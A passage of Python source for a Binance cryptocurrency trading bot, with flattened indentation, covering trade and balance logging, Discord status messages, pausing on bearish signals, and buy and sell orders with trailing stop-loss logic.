#msg2 = msg2 + ' CTT: ' + str(trade_wins+trade_losses) + ' CTW: ' + str(trade_wins) + ' CTL: ' + str(trade_losses) + ' CTWR%: ' + str(round(WIN_LOSS_PERCENT,2))
msg_discord_balance(msg1, msg2)
history_log(session_profit_incfees_perc, session_profit_incfees_total, unrealised_session_profit_incfees_perc, unrealised_session_profit_incfees_total, session_profit_incfees_perc + unrealised_session_profit_incfees_perc, session_profit_incfees_total+unrealised_session_profit_incfees_total, historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins+trade_losses, trade_wins, trade_losses, WIN_LOSS_PERCENT)
except Exception as e:
write_log(f'{"balance_report"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return msg1 + msg2
def history_log(sess_profit_perc, sess_profit, sess_profit_perc_unreal, sess_profit_unreal, sess_profit_perc_total, sess_profit_total, alltime_profit_perc, alltime_profit, total_trades, won_trades, lost_trades, winloss_ratio):
global last_history_log_date
time_between_insertion = datetime.now() - last_history_log_date
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
# only log balance to log file once every 60 seconds
if time_between_insertion.seconds > 60:
last_history_log_date = datetime.now()
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if os.path.exists(file_prefix + HISTORY_LOG_FILE):
HISTORY_LOG_TABLE = PrettyTable([])
with open(file_prefix + HISTORY_LOG_FILE, "r") as fp:
html = fp.read()
HISTORY_LOG_TABLE = from_html_one(html)
HISTORY_LOG_TABLE.format = True
HISTORY_LOG_TABLE.border = True
HISTORY_LOG_TABLE.align = "c"
HISTORY_LOG_TABLE.valign = "m"
HISTORY_LOG_TABLE.hrules = 1
HISTORY_LOG_TABLE.vrules = 1
HISTORY_LOG_TABLE.add_row([timestamp, len(coins_bought), TRADE_SLOTS, str(bot_paused), str(round(sess_profit_perc,2)), str(round(sess_profit,4)), str(round(sess_profit_perc_unreal,2)), str(round(sess_profit_unreal,4)), str(round(sess_profit_perc_total,2)), str(round(sess_profit_total,4)), str(round(alltime_profit_perc,2)), str(round(alltime_profit,4)), str(total_trades), str(won_trades), str(lost_trades), str(winloss_ratio)])
table_txt = HISTORY_LOG_TABLE.get_html_string()
#table_txt = HISTORY_LOG_TABLE.get_string()
else:
HISTORY_LOG_TABLE = PrettyTable([])
HISTORY_LOG_TABLE = PrettyTable(["Datetime", "Coins Holding", "Trade Slots", "Pausebot Active", "Session Profit %", "Session Profit $", "Session Profit Unrealised %", "Session Profit Unrealised $", "Session Profit Total %", "Session Profit Total $", "All Time Profit %", "All Time Profit $", "Total Trades", "Won Trades", "Lost Trades", "Win Loss Ratio"])
HISTORY_LOG_TABLE.format = True
HISTORY_LOG_TABLE.border = True
HISTORY_LOG_TABLE.align = "c"
HISTORY_LOG_TABLE.valign = "m"
HISTORY_LOG_TABLE.hrules = 1
HISTORY_LOG_TABLE.vrules = 1
# with open(HISTORY_LOG_FILE,'a+') as f:
# f.write('Datetime\tCoins Holding\tTrade Slots\tPausebot Active\tSession Profit %\tSession Profit $\tSession Profit Unrealised %\tSession Profit Unrealised $\tSession Profit Total %\tSession Profit Total $\tAll Time Profit %\tAll Time Profit $\tTotal Trades\tWon Trades\tLost Trades\tWin Loss Ratio\n')
HISTORY_LOG_TABLE.add_row([timestamp, len(coins_bought), TRADE_SLOTS, str(bot_paused), str(round(sess_profit_perc,2)), str(round(sess_profit,4)), str(round(sess_profit_perc_unreal,2)), str(round(sess_profit_unreal,4)), str(round(sess_profit_perc_total,2)), str(round(sess_profit_total,4)), str(round(alltime_profit_perc,2)), str(round(alltime_profit,4)), str(total_trades), str(won_trades), str(lost_trades), str(winloss_ratio)])
table_txt = HISTORY_LOG_TABLE.get_html_string()
#table_txt = HISTORY_LOG_TABLE.get_string()
if not table_txt == "":
with open(file_prefix + HISTORY_LOG_FILE,'w') as f:
#f.write(f'{timestamp}\t{len(coins_bought)}\t{TRADE_SLOTS}\t{str(bot_paused)}\t{str(round(sess_profit_perc,2))}\t{str(round(sess_profit,4))}\t{str(round(sess_profit_perc_unreal,2))}\t{str(round(sess_profit_unreal,4))}\t{str(round(sess_profit_perc_total,2))}\t{str(round(sess_profit_total,4))}\t{str(round(alltime_profit_perc,2))}\t{str(round(alltime_profit,4))}\t{str(total_trades)}\t{str(won_trades)}\t{str(lost_trades)}\t{str(winloss_ratio)}\n')
f.write(table_txt)
def write_log(logline):
try:
timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
with open(file_prefix + LOG_FILE,'a') as f:
f.write(timestamp + ' ' + logline + '\n')
#f.write(logline)
#f.write("n")
print(f'{logline}')
except Exception as e:
print(f'{"write_log"}: Exception in function: {e}')
print("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
exit(1)
def write_log_trades(logline):
#timestamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
if os.path.exists(file_prefix + TRADES_LOG_FILE):
LOGTABLE = PrettyTable([])
with open(file_prefix + TRADES_LOG_FILE, "r") as fp:
html = fp.read()
LOGTABLE = from_html_one(html)
LOGTABLE.format = True
LOGTABLE.border = True
LOGTABLE.align = "c"
LOGTABLE.valign = "m"
LOGTABLE.hrules = 1
LOGTABLE.vrules = 1
LOGTABLE.add_row(logline)
#table_txt = LOGTABLE.get_string()
LOGTABLE.sortby = "Datetime"
table_txt = LOGTABLE.get_html_string()
else:
LOGTABLE = PrettyTable([])
LOGTABLE = PrettyTable(["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"])
LOGTABLE.format = True
LOGTABLE.border = True
LOGTABLE.align = "c"
LOGTABLE.valign = "m"
LOGTABLE.hrules = 1
LOGTABLE.vrules = 1
LOGTABLE.add_row(logline)
LOGTABLE.sortby = "Coin"
table_txt = LOGTABLE.get_html_string()
#table_txt = LOGTABLE.get_string()
#with open(TRADES_LOG_FILE,'w') as f:
#improving the presentation of the log file
#f.write('Datetime\t\tType\t\tCoin\t\t\tVolume\t\t\tBuy Price\t\tCurrency\t\t\tSell Price\tProfit $\t\tProfit %\tSell Reason\t\t\t\tEarned\n')
if not table_txt == "":
with open(file_prefix + TRADES_LOG_FILE,'w') as f:
#f.write(timestamp + ' ' + logline + '\n')
f.write(table_txt)
def msg_discord_balance(msg1, msg2):
global last_msg_discord_balance_date, discord_msg_balance_data, last_msg_discord_balance_date
time_between_insertion = datetime.now() - last_msg_discord_balance_date
# only put the balance message to discord once every 60 seconds and if the balance information has changed since last times
# message sending time was increased to 2 minutes for more convenience
if time_between_insertion.seconds > 120:
if msg2 != discord_msg_balance_data:
msg_discord(msg1 + msg2)
discord_msg_balance_data = msg2
else:
# ping msg to know the bot is still running
msg_discord(".")
#the variable is initialized so that sending messages every 2 minutes can work
last_msg_discord_balance_date = datetime.now()
def msg_discord(msg):
message = msg + '\n\n'
if MSG_DISCORD:
#Webhook of my channel. Click on edit channel --> Webhooks --> Creates webhook
mUrl = "https://discordapp.com/api/webhooks/"+DISCORD_WEBHOOK
data = {"content": message}
response = requests.post(mUrl, json=data)
#BB
# print(response.content)
def pause_bot():
'''Pause the script when external indicators detect a bearish trend in the market'''
global bot_paused, session_profit_incfees_perc, hsp_head, session_profit_incfees_total, PAUSEBOT_MANUAL
PAUSEBOT = False
# start counting for how long the bot has been paused
start_time = time.perf_counter()
try:
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.pause", "/*.exc"]] for item in sublist]
for filename in files:
if os.path.exists(filename) == True:
PAUSEBOT = True
break
while PAUSEBOT or PAUSEBOT_MANUAL: #os.path.exists("signals/pausebot.pause") or PAUSEBOT_MANUAL:
# do NOT accept any external signals to buy while in pausebot mode
remove_external_signals('buy')
if bot_paused == False:
if PAUSEBOT_MANUAL:
if not SCREEN_MODE == 0: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Purchase paused manually, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT.Purchase paused manually, stop loss and take profit will continue to work...'
else:
if not SCREEN_MODE == 0: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Buying paused due to negative market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Buying paused due to negative market conditions, stop loss and take profit will continue to work.'
msg_discord(msg)
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
last_price = get_price(True)
# pausing here
if hsp_head == 1:
# if not SCREEN_MODE == 2: print(f'Paused...Session profit: {session_profit_incfees_perc:.2f}% Est: ${session_profit_incfees_total:.{decimals()}f} {PAIR_WITH}')
balance_report(last_price)
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and ser pause_bot to False
if bot_paused == True:
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Resuming buying due to positive market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
msg = str(datetime.now()) + ' | PAUSEBOT. Resuming buying due to positive market conditions, total sleep time: ' + str(time_elapsed)
msg_discord(msg)
#PAUSEBOT = False
bot_paused = False
except Exception as e:
write_log(f'{"pause_bot"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
return
def convert_volume():
'''Converts the volume given in TRADE_TOTAL from "USDT"(or coin selected) to the each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
global TRADE_TOTAL
lot_size = {}
volume = {}
try:
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
#try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0: lot_size[coin] = 0
#except Exception as e:
#if not SCREEN_MODE == 2: print(f'convert_volume() exception: {e}')
#pass
#except KeyboardInterrupt as ki:
#pass
#try:
#print("COIN: " + str(coin) + " TRADE_TOTAL: " + str(TRADE_TOTAL) + " last_price[coin]['price']: " + str(last_price[coin]['price']))
# calculate the volume in coin from TRADE_TOTAL in PAIR_WITH (default)
volume[coin] = float(TRADE_TOTAL / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
# original code: volume[coin] = float('{:.1f}'.format(volume[coin]))
volume[coin] = int(volume[coin])
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
#volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
volume[coin] = truncate(volume[coin], lot_size[coin])
#except Exception as e:
#if not SCREEN_MODE == 2: print(f'convert_volume()2 exception: {e}')
#pass
#except KeyboardInterrupt as ki:
#pass
except Exception as e:
write_log(f'convert_volume() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
#except KeyboardInterrupt as ki:
#pass
return volume, last_price
def set_exparis(pairs):
file_name = "config.yml"
parsed_config = load_config(file_name)
with open(file_name, 'r') as file:
data = file.readlines()
c = 0
for line in data:
c = c + 1
if "EX_PAIRS: [" in line:
break
#EX_PAIRS = parsed_config['trading_options']['EX_PAIRS']
e = False
pairs = pairs.strip().replace('USDT','')
for coin in EX_PAIRS:
if coin == pairs:
e = True
break
else:
e = False
if e == False:
print(f'The exception has been saved in EX_PAIR in the configuration file...')
EX_PAIRS.append(pairs)
data[c-1] = " EX_PAIRS: " + str(EX_PAIRS) + "\n"
with open(file_name, 'w') as f:
f.writelines(data)
def buy_external_signals():
external_list = {}
#signals = {}
# check directory and load pairs from files into external_list
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.buy", "/*.exs"]] for item in sublist]
#signals = glob.glob(mask) #"signals/*.buy")
#print("signals: ", signals)
for filename in files: #signals:
for line in open(filename):
symbol = line.strip()
if symbol.replace(PAIR_WITH, "") not in EX_PAIRS:
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def buy():
try:
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
global USED_BNB_IN_SESSION
for coin in volume:
if coin not in coins_bought and coin.replace(PAIR_WITH,'') not in EX_PAIRS:
#litle modification of Sparky
volume[coin] = math.floor(volume[coin]*100000)/100000
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.BUY}Preparing to buy {volume[coin]} of {coin} @ ${last_price[coin]['price']}{txcolors.DEFAULT}")
msg1 = str(datetime.now()) + ' | BUY: ' + coin + '. V:' + str(volume[coin]) + ' P$:' + str(last_price[coin]['price']) + ' ' + PAIR_WITH + ' invested:' + str(float(volume[coin])*float(last_price[coin]['price']))
msg_discord(msg1)
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
#if LOG_TRADES:
BuyUSDT = str(float(volume[coin]) * float(last_price[coin]['price'])).zfill(9)
volumeBuy = format(volume[coin], '.6f')
last_price_buy = str(format(float(last_price[coin]['price']), '.8f')).zfill(3)
BuyUSDT = str(format(float(BuyUSDT), '.14f')).zfill(4)
coin = '{0:<9}'.format(coin)
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(last_price_buy),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
write_signallsell(coin.removesuffix(PAIR_WITH))
continue
# try to create a real order if the test orders did not raise an exception
try:
order_details = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
write_log(f'buy() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
if DEBUG: print(f'Order returned, saving order to file')
if not TEST_MODE:
orders[coin] = extract_order_data(order_details)
#adding the price in USDT
volumeBuy = float(format(float(volume[coin]), '.6f'))
last_price_buy = float(format(orders[coin]['avgPrice'], '.3f'))
BuyUSDT = str(format(orders[coin]['volume'] * orders[coin]['avgPrice'], '.14f')).zfill(4)
#improving the presentation of the log file
coin = '{0:<9}'.format(coin)
buyFeeTotal1 = (volumeBuy * last_price_buy) * float(TRADING_FEE/100)
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal1
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(orders[coin]['avgPrice']),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
else:
#adding the price in USDT
BuyUSDT = volume[coin] * last_price[coin]['price']
volumeBuy = format(float(volume[coin]), '.6f')
last_price_buy = format(float(last_price[coin]['price']), '.3f')
BuyUSDT = str(format(BuyUSDT, '.14f')).zfill(4)
#improving the presentation of the log file
coin = '{0:<9}'.format(coin)
buyFeeTotal1 = (volumeBuy * last_price_buy) * float(TRADING_FEE/100)
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal1
#(["Datetime", "Type", "Coin", "Volume", "Buy Price", "Sell Price", "Sell Reason", "Profit $"]) "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Buy", coin.replace(PAIR_WITH,""), round(float(volumeBuy),8), str(round(float(last_price[coin]['price']),8)), str(round(float(BuyUSDT),8)) + " " + PAIR_WITH, 0, 0, "-", 0])
write_signallsell(coin)
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Signal detected, but there is already an active trade on {coin}')
except Exception as e:
write_log(f'buy() exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
return orders, last_price, volume
def sell_coins(tpsl_override = False, specific_coin_to_sell = ""):
try:
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit_incfees_perc, session_profit_incfees_total, coin_order_id, trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, sell_all_coins, session_USDT_EARNED, TUP, TDOWN, TNEUTRAL, USED_BNB_IN_SESSION, TRADE_TOTAL, sell_specific_coin
externals = sell_external_signals()
last_price = get_price(False) # don't populate rolling window
#last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
BUDGET = TRADE_TOTAL * TRADE_SLOTS
for coin in list(coins_bought):
if sell_specific_coin and not specific_coin_to_sell == coin:
continue
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
sellFeeTotal = (coins_bought[coin]['volume'] * LastPrice) * (TRADING_FEE/100)
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
buyFeeTotal = (coins_bought[coin]['volume'] * BuyPrice) * (TRADING_FEE/100)
PriceChange_Perc = float((LastPrice - BuyPrice) / BuyPrice * 100)
#PriceChangeIncFees_Perc = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Perc = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) / (BuyPrice+buyFee) * 100)
PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['take_profit']) / 100))
SL = float(coins_bought[coin]['bought_at']) + ((float(coins_bought[coin]['bought_at']) * (coins_bought[coin]['stop_loss']) / 100))
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
if LastPrice > TP and USE_TRAILING_STOP_LOSS and not sell_all_coins and not tpsl_override and not sell_specific_coin:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
#add metod from OlorinSledge
if PriceChange_Perc >= 0.8:
# price has changed by 0.8% or greater, a big change. Make the STOP LOSS trail closely to the TAKE PROFIT
# so you don't lose this increase in price if it falls back
coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
else:
# price has changed by less than 0.8%, a small change. Make the STOP LOSS trail loosely to the TAKE PROFIT
# so you don't get stopped out of the trade prematurely
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
# we've got a negative stop loss - not good, we don't want this.
if coins_bought[coin]['stop_loss'] <= 0:
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] * .25
# supress old metod
#coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
#coins_bought[coin]['take_profit'] = PriceChange_Perc + TRAILING_TAKE_PROFIT
# if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
#if DEBUG: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.{decimals()}f} and SL {coins_bought[coin]['stop_loss']:.{decimals()}f} accordingly to lock-in profit")
if DEBUG: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}{coin} TP reached, adjusting TP {str(round(TP,2))} and SL {str(round(SL,2))} accordingly to lock-in profit")
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
sellCoin = False
sell_reason = ""
if SELL_ON_SIGNAL_ONLY:
# only sell if told to by external signal
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
else:
if LastPrice < SL:
sellCoin = True
if USE_TRAILING_STOP_LOSS:
if PriceChange_Perc >= 0:
sell_reason = "TTP " #+ str(SL) + " reached"
else:
sell_reason = "TSL " #+ str(SL) + " reached"
else:
sell_reason = "SL " #+ str(SL) + " reached"
sell_reason = sell_reason + str(format(SL, ".18f")) + " reached"
#sell_reason = sell_reason + str(round(SL,2)) + " reached"
if LastPrice > TP:
sellCoin = True
#sell_reason = "TP " + str(format(SL, ".18f")) + " reached"
sell_reason = "TP " + str(round(TP,2)) + " reached"
if coin in externals:
sellCoin = True
sell_reason = 'External Sell Signal'
if sell_all_coins:
sellCoin = True
sell_reason = 'Sell All Coins'
if sell_specific_coin:
sellCoin = True
sell_reason = 'Sell Specific Coin'
if tpsl_override:
sellCoin = True
sell_reason = 'Session TPSL Override reached'
if sellCoin:
print(f"{txcolors.WARNING}BOT: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}Sell: {coins_bought[coin]['volume']} of {coin} | {sell_reason} | ${float(LastPrice):g} - ${float(BuyPrice):g} | Profit: {PriceChangeIncFees_Perc:.2f}% Est: {((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH} (Inc Fees) {PAIR_WITH} earned: {(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))}{txcolors.DEFAULT}")
msg1 = str(datetime.now()) + '| SELL: ' + coin + '. R:' + sell_reason + ' P%:' + str(round(PriceChangeIncFees_Perc,2)) + ' P$:' + str(round(((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100,4)) + ' ' + PAIR_WITH + ' earned:' + str(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))
msg_discord(msg1)
# try to create a real order
try:
if not TEST_MODE:
#lot_size = coins_bought[coin]['step_size']
#if lot_size == 0:
# lot_size = 1
#lot_size = lot_size.index('1') - 1
#if lot_size < 0:
# lot_size = 0
order_details = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
#if repr(e).upper() == "APIERROR(CODE=-1111): PRECISION IS OVER THE MAXIMUM DEFINED FOR THIS ASSET.":
write_log(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}sell_coins() Exception occured on selling the coin! Coin: {coin}\nSell Volume coins_bought: {coins_bought[coin]['volume']}\nPrice:{LastPrice}\nException: {e}")
# run the else block if coin has been sold and create a dict for each coin sold
else:
if not TEST_MODE:
coins_sold[coin] = extract_order_data(order_details)
LastPrice = coins_sold[coin]['avgPrice']
sellFee = coins_sold[coin]['tradeFeeUnit']
coins_sold[coin]['orderid'] = coins_bought[coin]['orderid']
priceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# update this from the actual Binance sale information
#PriceChangeIncFees_Unit = float((LastPrice+sellFee) - (BuyPrice+buyFee))
PriceChangeIncFees_Unit = float((LastPrice-sellFee) - (BuyPrice+buyFee))
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
time_held = (timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10])).total_seconds())/3600
if not int(MAX_HOLDING_TIME) == 0:
if time_held >= int(MAX_HOLDING_TIME): set_exparis(coin)
if DEBUG:
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}sell_coins() | Coin: {coin} | Sell Volume: {coins_bought[coin]['volume']} | Price:{LastPrice}")
# Log trade
#BB profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume']) * (1-(buyFee + sellFeeTotal))
profit_incfees_total = coins_sold[coin]['volume'] * PriceChangeIncFees_Unit
#write_log_trades(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit_incfees_total:.{decimals()}f} {PAIR_WITH} ({PriceChange_Perc:.2f}%)")
SellUSDT = coins_sold[coin]['volume'] * LastPrice
USDTdiff = SellUSDT - (BuyPrice * coins_sold[coin]['volume'])
session_USDT_EARNED = session_USDT_EARNED + USDTdiff
#improving the presentation of the log file
# it was padded with trailing zeros to give order to the table in the log file
VolumeSell = format(float(coins_sold[coin]['volume']), '.6f')
BuyPriceCoin = format(BuyPrice, '.8f')
SellUSDT = str(format(SellUSDT, '.14f')).zfill(4)
coin = '{0:<9}'.format(coin)
#BuyUSDT = (BuyPrice * coins_sold[coin]['volume'])
#last_price[coin]['price']
#["Datetime", "Type", "Coin", "Volume", "Buy Price", "Amount of Buy", "Sell Price", "Amount of Sell", "Sell Reason", "Profit $"] "USDTdiff"])
write_log_trades([datetime.now().strftime("%y-%m-%d %H:%M:%S"), "Sell", coin.replace(PAIR_WITH,""), str(round(float(VolumeSell),8)), str(round(float(BuyPrice),8)), 0, str(round(float(LastPrice),8)), str(round(float(SellUSDT),8)) + " " + PAIR_WITH, sell_reason, str(round(float(USDTdiff),8)) + " " + PAIR_WITH])
#if reinvest_mode:
# TRADE_TOTAL += (profit_incfees_total / TRADE_SLOTS)
#this is good
session_profit_incfees_total = session_profit_incfees_total + profit_incfees_total
session_profit_incfees_perc = session_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
historic_profit_incfees_total = historic_profit_incfees_total + profit_incfees_total
historic_profit_incfees_perc = historic_profit_incfees_perc + ((profit_incfees_total/BUDGET) * 100)
#TRADE_TOTAL*PriceChangeIncFees_Perc)/100
#if (LastPrice+sellFee) >= (BuyPrice+buyFee):
USED_BNB_IN_SESSION = USED_BNB_IN_SESSION + buyFeeTotal
#if IGNORE_FEE:
# sellFee = 0
# buyFee = 0
#if (LastPrice-sellFee) >= (BuyPrice+buyFee):
#if USDTdiff > 0.:
if (LastPrice) >= (BuyPrice):
trade_wins += 1
else:
trade_losses += 1
update_bot_stats()
if not sell_all_coins and not sell_specific_coin:
# within sell_all_coins, it will print display to screen
balance_report(last_price)
# sometimes get "rate limited" errors from Binance if we try to sell too many coins at once
# so wait 1 second in between sells
time.sleep(1)
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
#if not SCREEN_MODE == 2: print(f"Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({(TRADE_TOTAL*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
if not SCREEN_MODE == 2: print(f"{txcolors.WARNING}BOT: {txcolors.DEFAULT}Holding: {coins_bought[coin]['volume']} of {coin} | {LastPrice} - {BuyPrice} | Profit: {txcolors.SELL_PROFIT if PriceChangeIncFees_Perc >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}% Est: ({((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.{decimals()}f} {PAIR_WITH}){txcolors.DEFAULT}")
#if hsp_head == 1 and len(coins_bought) == 0: if not SCREEN_MODE == 2: print(f"No trade slots are currently in use")
# if tpsl_override: is_bot_running = False
except Exception as e:
write_log(f'{"sell_coins"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
pass
return coins_sold
def sell_all(msgreason, session_tspl_ovr = False):
global sell_all_coins
msg_discord(f'{str(datetime.now())} | SELL ALL COINS: {msgreason}')
# stop external signals so no buying/selling/pausing etc can occur
stop_signal_threads()
# sell all coins NOW!
sell_all_coins = True
coins_sold = sell_coins(session_tspl_ovr)
remove_from_portfolio(coins_sold)
# display final info to screen
last_price = get_price()
discordmsg = balance_report(last_price)
msg_discord(discordmsg)
sell_all_coins = False
#extracted from the code of OlorinSledge
def sell_coin(coin):
global sell_specific_coin
#print(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
msg_discord(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
# sell all coins NOW!
sell_specific_coin = True
coins_sold = sell_coins(False, coin)
remove_from_portfolio(coins_sold)
sell_specific_coin = False
def sell_external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.sell")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
if DEBUG: print(f'{symbol} added to sell_external_signals() list')
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external SELL signalling file{txcolors.DEFAULT}')
return external_list
def extract_order_data(order_details):
global TRADING_FEE, STOP_LOSS, TAKE_PROFIT
transactionInfo = {}
# This code is from GoranJovic - thank you!
#
